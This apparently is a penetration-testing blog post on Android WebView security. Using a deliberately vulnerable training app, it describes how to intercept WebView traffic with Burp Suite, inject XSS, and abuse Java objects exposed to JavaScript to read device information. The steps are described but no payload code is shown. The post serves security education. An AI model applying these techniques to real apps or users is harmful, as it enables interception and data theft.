- Published on
- Juan Urbano Stordeur
TL;DR2: The post uses practical examples and screenshots to demonstrate these concepts, aiming to educate on potential exploits and necessary precautions. For all the practical examples and exercises of this unit, we are going to use the WebViews_&_DeepLinks-true.apk application by Just Mobile Security. Additionally we’ll provide WebViews_&_DeepLinks-false.apk which mitigates the vulnerabilities analyzed in this post.
In this first article, we will specifically focus on:
- XSS in WebViews
- Information Theft in WebViews
Exploitations related to Open Redirect via Deep Link and File Theft will be covered in the next post. Each topic in this article will be explored in detail to provide a clear understanding of their impact and mitigation strategies.
Introduction to WebView Security in Android Apps
This post focuses on finding, exploiting and understanding some common vulnerabilities in Android WebViews. Essential to this analysis are two key concepts: Static and Dynamic Analysis of Android Apps.
Static analysis involves examining the app's code to pinpoint potential weaknesses. Dynamic analysis, meanwhile, is about observing the app in action, particularly useful for understanding how it handles network traffic. Together, these approaches provide a comprehensive analysis of the application for identifying and exploiting WebView vulnerabilities.
Web applications can be at risk from various vulnerabilities, which also extend to WebViews, if they are not configured safely. These vulnerabilities include Open Redirect Exploitation via Deep Link, XSS in WebViews, and potential information or files theft.
For penetration testers, a key strategy is to analyze controllable data and input fields within web & mobile applications. Determining if these inputs are sanitized is crucial. This approach helps uncover implementations in Android apps that are potentially vuln
Potentially Vulnerable Functions
This article addresses a range of functions in WebViews that could potentially be exploited. While we will discuss several critical ones, it's important to understand that there are many others. Each function, depending on its implementation and usage, can present unique security challenges.
In this example, we will analyze the WebViews_&_DeepLinks application that loads a vulnerable example site that allows XSS.
This is a site for testing and practicing XSS developed by Google.
Cross Site Scripting in WebViews
We are going to perform a MITM attack on the WebViews_&_DeepLinks App using Burp Suite. If you don't know how to use burp suite to perform a MITM attack here is a short video on how to export burps certificate and install it on an android device created by the Just Mobile Security team.
- We capture the request.
- When the WebView sends the request for getting the page, we will intercept it and inject the XSS payload
2.Java Objects Exposed Through WebViews
Information Theft in WebView
Using the same WebViews_&_DeepLinks application.
- We decompile the APK with JADX and analyze the code to find the unsafe implementation
- Now we generate an XSS payload to exploit this unsafe interface and obtain the device’s information .
- We capture the request.
- When the WebView sends the request for getting the page, we will intercept it and inject the XSS payload.
Remember, while these technologies offer numerous benefits, their secure implementation is vital to protect both the app and user data. We will continue to explore these topics, so stay tuned for the next post, which will focus on Deep Links and their associated security considerations.